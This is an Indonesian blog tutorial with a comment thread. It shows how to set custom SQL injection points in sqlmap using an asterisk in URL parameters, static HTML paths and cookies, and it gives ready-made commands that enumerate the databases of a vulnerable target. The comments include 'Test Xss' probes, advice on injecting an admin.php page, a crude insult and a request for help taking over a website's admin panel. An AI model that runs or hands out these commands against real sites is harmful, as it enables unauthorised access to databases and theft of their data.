Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.
Misalnya begini:
https://target.com/article.php?page=2&id=5
Dan inject pointnya ada di parameter id. Maka perintahnya
sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs
Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di
https://target.com/article-315'-abcde.html
Maka di sqlmap perintahnya
sqlmap -u "https://target.com/article-315*-abcde.html" --dbs
Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya
sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
- referensi : https://miloserdov.org/?p=879
min, kalo mau belajar dari dasar banget, liat dari artikel yang mana ya?
Test Xss
Test Xss
Test Xss
Kalo yg diketahui cuman admin.php nya aja min?
ya injectnya di www.domain.com/admin.php*
kontol lu mmk jembdot
kalau saya minta dibantu ambilkan admin web saya yang dibuatkan pihak ketiga bisa nggak sobat,saya nggak bisa kendalikan semua jadi ribet kawan.
testes
teetesss